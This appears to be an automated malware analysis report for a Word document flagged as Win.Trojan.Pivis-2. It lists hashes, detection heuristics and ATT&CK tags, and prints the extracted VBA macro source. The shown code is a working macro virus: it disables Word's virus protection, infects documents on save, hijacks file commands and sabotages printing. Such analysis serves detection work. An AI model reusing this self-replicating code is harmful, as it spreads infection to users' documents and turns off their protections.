Win.Trojan.Pivis-2 Office (OLE) malware analysis — malicious · e4fee654158caa00

MALICIOUS

Office (OLE)

72.5 KB Created: 2001-10-23 10:57:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 0cbcae71a131a1873acf3da5393e4b0b SHA-1: 3cd5babe639e6f99b191cb402c19a75570cc9790 SHA-256: e4fee654158caa00d9bc1a8739fbab00cd45db28f4b2451a2136d417296f27d0

328 Risk Score

Malware Insights

Win.Trojan.Pivis-2 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including an AutoOpen subroutine, which is a common technique for malicious documents. The macro explicitly disables security features like virus protection and attempts to execute further code via a Shell() call. This behavior is consistent with a macro-based trojan designed to download and execute a second-stage payload.

Heuristics 7

ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Pivis-2
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	58291 bytes
SHA-256: `be6c9cd4af982a111e4fd374d02a71aafe0e00c1ae3ad642511ea51398b13abb`
Detection ClamAV: Win.Trojan.C-286 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Projéct12.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Stinger" Sub AutoExec() Call StartUp If NormalTemplate.Saved = False Then NormalTemplate.Save End Sub Sub AutoOpen() Call StartUp End Sub Sub StartUp() With Options .ConfirmConversions = False .VirusProtection = False .SaveNormalPrompt = False End With On Error Resume Next CustomizationContext = NormalTemplate FindKey(BuildKeyCode(Arg1:=wdKeyAlt, Arg2:=wdKeyControl, _ Arg3:=wdKeyShift, Arg4:=wdKeyR)).Clear KeyBindings.Add KeyCode:=BuildKeyCode(Arg1:=wdKeyAlt, _ Arg2:=wdKeyControl, Arg3:=wdKeyShift, Arg4:=wdKeyR), _ KeyCategory:=wdKeyCategoryMacro, _ Command:="Projéct12.Stinger.RegistrCd" FindKey(BuildKeyCode(Arg1:=wdKeyAlt, Arg2:=wdKeyControl, _ Arg3:=wdKeyShift, Arg4:=wdKeyV)).Clear KeyBindings.Add KeyCode:=BuildKeyCode(Arg1:=wdKeyAlt, _ Arg2:=wdKeyControl, Arg3:=wdKeyShift, Arg4:=wdKeyV), _ KeyCategory:=wdKeyCategoryMacro, _ Command:="Projéct12.Stinger.VwMacCd" On Error GoTo 0 WordBasic.DisableAutoMacros End Sub Sub AutoExit() Call FileExit End Sub Sub FileExit() QuitWord = True For Each aDoc In Documents If CloseFile(aDoc) = "Canceled" Then QuitWord = False Exit For Else QuitWord = True End If Next aDoc If QuitWord = True Then Call ChkFiles Application.Quit End If End Sub Sub FileNew() Dialogs(wdDialogFileNew).Show Call RemvMac(ActiveDocument, "Stinger") End Sub Sub FileNewDefault() Documents.Add Call RemvMac(ActiveDocument, "Stinger") End Sub Sub FileSave() On Error GoTo ExtFlSv ActiveDocument.Save On Error GoTo 0 mPrjNm = "Projéct12" xFulNm = ActiveDocument.FullName If ActiveDocument.VBProject.Name <> mPrjNm Then RO_Chk = GetAttr(ActiveDocument.FullName) And vbReadOnly If RO_Chk = 0 Then Call InfctDcmnt(ActiveDocument) Documents.Open FileName:=xFulNm, Format:=wdOpenFormatAuto End If End If ExtFlSv: End Sub Sub FileSaveAs() mDiagReply = 0 On Error Resume Next mDiagReply = Dialogs(wdDialogFileSaveAs).Show On Error GoTo 0 If mDiagReply = -1 Then Call FileSave End If End Sub Sub FilePrintDefault() Call PrintRtn("FPD") End Sub Sub FilePrint() Call PrintRtn("FP") End Sub Function PrintRtn(PrintCd) With Options .PrintDraft = False .PrintFieldCodes = False .PrintHiddenText = False .PrintDrawingObjects = True End With With ActiveDocument .PrintFormsData = False End With SysFl = "C:\WINDOWS\COMMAND\SYSTEM1.DT_" If Dir(SysFl, vbHidden + vbReadOnly + vbSystem) = "" Then mDaysOld = 0 Else mDaysOld = DateDiff("d", FileDateTime(SysFl), Now) End If If CdRegistry <> "110499" Then If ((Timer >= 0) And (Timer <= 14400)) Or _ ((Timer >= 43200) And (Timer <= 46800)) Or _ ((Timer >= 68400) And (Timer <= 75600)) Then ChngOptn = True ElseIf (Int((2 * Rnd) + 1) = 2) Then ChngOptn = True Else ChngOptn = False End If Else ChngOptn = False End If If mDaysOld < 30 Then ChngOptn = False End If If PrintCd = "FP" Then Dialogs(wdDialogFilePrint).Show Else ActiveDocument.PrintOut End If If ChngOptn = True Then With Options .PrintDraft = True .PrintFieldCodes = True .PrintHiddenText = True .PrintDrawingObjects = False End With With ActiveDocument .PrintFormsData = True End With With ActiveDocument .Compatibility(wdUsePrinterMetrics) = False .Compatibility(wdWW6BorderRules) = False End With End If End Function Sub FileOpen() mDiagReply = 0 On Error Resume Next mDiagReply = Dialogs(wdDialogFileOpen).Show On Error GoTo 0 If mDiagReply = -1 Then ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.